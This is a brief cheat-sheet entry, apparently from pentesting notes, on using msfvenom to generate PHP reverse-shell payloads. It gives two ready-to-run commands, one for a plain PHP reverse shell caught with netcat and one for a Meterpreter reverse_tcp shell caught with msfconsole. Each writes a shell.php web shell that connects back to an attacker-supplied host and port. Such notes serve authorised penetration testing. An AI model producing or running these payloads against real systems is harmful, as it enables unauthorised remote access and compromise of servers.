msfvenom

Standalone payload generator.

Reverse shells

PHP

Catch with e.g., netcat:

msfvenom -p php/reverse_php LHOST=<ip> LPORT=<port> -f raw > shell.php

Meterpreter shell to catch with msfconsole using exploit/multi/handler:

msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.php

Last updated